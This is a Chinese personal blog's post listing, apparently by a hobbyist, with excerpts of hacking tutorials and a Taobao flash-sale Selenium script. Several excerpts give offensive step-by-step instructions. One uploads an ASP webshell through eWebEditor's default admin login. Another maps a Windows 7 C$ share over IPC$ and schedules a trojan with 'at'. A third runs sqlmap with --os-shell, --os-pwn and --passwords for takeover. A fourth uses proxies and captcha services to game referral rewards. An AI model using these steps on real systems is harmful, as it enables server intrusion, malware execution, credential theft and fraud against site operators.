首页
关于
Search
1
GS--Python解决多线程出现There is no current event loop in thread 'Thread-1'
24 阅读
2
GS----Python开发TeleGarm注册遇到的问题
22 阅读
3
【教程】mdk3伪造wifi
14 阅读
4
入侵445端口-永恒之蓝漏洞利用-Metasploit
12 阅读
5
KALI--msfvenom生成远程控制木马入侵win7
12 阅读
默认分类
技术分享
资源分享
软件分享
登录
Search
gsxiaogu
累计撰写
18
篇文章
累计收到
0
条评论
首页
栏目
默认分类
技术分享
资源分享
软件分享
页面
关于
搜索到
12
篇与
的结果
2022-06-24
GS--利用代刷网的邀请机制免费刷各种会员
免费刷各种会员 利用本站长自制工具:自动邀请软件2.0 2020.12.26更新 工具更新至6.6版本:6.6版本下载地址最新版文件解压密码:www.gusix.cn熊猫代理IP注册地址:http://www.xiongmaodaili.com/联众打码注册地址:https://www.jsdati.com/利用各大qq代刷网的分享领奖功能来撸一波qq赞,空间访客,qq超级会员啥的具体看下面操作 1.随便找个代刷网站。找到有免费领的地方带你进去,大多数代刷网的领取在福利那里2.打开之后可以随便选一个东西进行领取3.点击立即推广即可,复制链接打开我们的工具4.打开工具 5.输入邀请链接注:验证码链接和提交链接可以抓包来进行填写一般的提交链接是:网址/ajax.php?act=verifyCode&type=viewVerifyCode一般的验证码链接是:网址/ajax.php?act=getVerifyCodeImg&type=viewVerifyCode&r=0.10107857787055896只需要填写邀请链接点击开始即可填写完毕之后设置数量点击开始邀请 6.刷完之后我们看一下代刷网的邀请人数7.OK!完成了坐等到账把!附上到账图 --GS小顾
2022年06月24日
6 阅读
0 评论
0 点赞
2022-06-24
eWebEditor--编辑器获取shell
eWebEditor编辑器getshell 1.登录编辑器后台(默认密码账号admin),也可以找到编辑器的数据库或配置文件查看2.在样式管理中新增样式,并在附件类型中添加 asp 格式的附件类型3.完成后点击预览你新建的样式,上传附件选择你的asp马4.上传完成后点预览,点你上传的文件就可以看到上传地址了,菜刀连接测试。 --文章转载至千世博客
2022年06月24日
11 阅读
0 评论
0 点赞
2022-06-24
渗透139端口-windows7的IPC$漏洞创建与利用
IPC$漏洞创建1.靶机地址:192.168.112.112.系统win71.目标机上编辑本地策略,运行 gpedit.msc2.在 计算机配置 >windows设置 >安全设置 >本地策略 >安全选项 中找到 网络访问:本地账户的共享和安全模型 安全设置设为经典3.将 账户:使用空密码的本地账户只允许进行控制台登录 设置为禁用IPC$漏洞利用IPC$漏洞地址:192.168.112.111.创建连接net use \\192.168.112.11\ipc$2.映射对方C盘到本地Z盘(不指定要Z盘,只要不与本地盘符重名就行)net use z: \\192.168.112.11\c$3.将木马文件拷贝到Z盘下,并查询对方当前时间net time \\192.168.112.114.添加执行事件,在某时执行木马文件.等到规定时间内就会执行所选文件at \\192.168.112.11 15:11 z:\test.exe
2022年06月24日
8 阅读
0 评论
0 点赞
2022-06-24
Python---开发淘宝商品准点秒杀脚本
使用Python---淘宝商品准点秒杀脚本 学会之后!妈妈再也不用担心我抢不到羊毛了!1.Python3.6.7下载地址:https://www.lanzous.com/i8fjk4b2.GoogleChram浏览器下载链接:https://www.lanzous.com/i8fjm4d3.Chram插件下载地址:https://www.lanzous.com/i8fjm6f注意插件和谷歌浏览器的版本要一致!!!下载链接:https://chromedriver.storage.googleapis.com/index.html 1.进入python教程首先安装python的第三方库进入cmd界面输入pip install selenium2.安装完成配置插件的环境变量把下载好的插件放在谷歌浏览器的目录里,然后将浏览器路径放入Path新建环境变量里C:\Users\Hasee\AppData\Local\Google\Chrome\Application 电脑-右键-属性-高级系统设置-环境变量 3.具体代码注释我下面全部写好呈现出来'''脚本作者GS小顾此脚本主为淘宝商品准点秒杀功能作者联系方式QQ:1668615353请保留版权信息谢谢支持'''from selenium import webdriverimport time时间格式化fmt = "%Y-%m-%d %H:%M:%S"用户设定秒杀的时间mubiaotime = time.strptime("2020-1-2 15:42:00",fmt)定义自己的账号密码到变量user = ""password = ""定义函数def main():#选择浏览器插件 b = webdriver.Chrome() #全屏浏览器 b.maximize_window() #输入目标网址 b.get('https://www.taobao.com') #自动输入账号密码登录功能 # b.find_element_by_id('TPL_username_1').send_keys(user) # b.find_element_by_id('TPL_password_1').send_keys(password) # b.find_element_by_link_text('登 录').click() # time.sleep(3) #扫码登陆版本 b.find_element_by_link_text("亲,请登录").click() print('请在60秒内完成扫码登陆') i = 60 while i: i -= 1 time.sleep(1) try: b.find_element_by_class_name("member-nick-info") except Exception as e: print("剩余%d秒"%i) else: print("登陆成功") # 打开购物车 b.get("https://cart.taobao.com/cart.htm") # 选择所有商品 b.find_element_by_class_name('cart-checkbox ').click() #time.sleep(1) #点击结算 time.sleep(5) b.find_element_by_link_text("结 算").click() #秒杀倒计时 nowtime = time.localtime() kaishi = (mubiaotime.tm_hour - nowtime.tm_hour) * 60 * 60 + (mubiaotime.tm_min - nowtime.tm_min) * 60 + mubiaotime.tm_sec - nowtime.tm_sec print("剩余秒杀时间%d秒"%kaishi) time.sleep(kaishi) b.find_element_by_link_text("提交订单").click() time.sleep(3) print("秒杀成功,订单在待支付那支付即可") time.sleep(5) break #时间到提交订单,误差0.01-0.03秒 if name == '__main__':main() 作者--小顾
2022年06月24日
11 阅读
0 评论
0 点赞
2022-06-24
Kali-SQLmap寻找注入点入侵电脑
SQLmap命令 测试一次入侵注入点:http://192.168.207.131/demo/sql.php?news=1内网搭建的注入点 1.打开kali终端输入-u //目标地址,检查该注入点是否存在注入sqlmap -u "http://192.168.207.131/demo/sql.php?news=1"没有出现红色的报错证明该注入寻在注入2.直接进行暴力拿shell(如果失败进行第三步) sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-shell //获取该服务器的shell这里选择该网站使用的语言(默认是PHP)选择4然后一直回车这里成功获取到shell,权限足够的话,可以直接进行一些邪恶的操作3.没有获取成功也别急可以试试另外几个sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-pwn //获取一个OOB shell,meterpreter或VNC sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-smbrelay // 一键获取一个OOB shell,meterpreter或VNC sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-cmd=OSCMD //执行操作系统命令 4.猜解库名(都不行看这里)sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --dbs //猜解数据库表名5.直接猜解数据库的用户名和该数据库密码的哈希值sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --users //枚举数据库管理系统用户 sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --passwords //枚举数据库管理系统用户密码哈希 --小顾
2022年06月24日
10 阅读
0 评论
0 点赞
1
2
3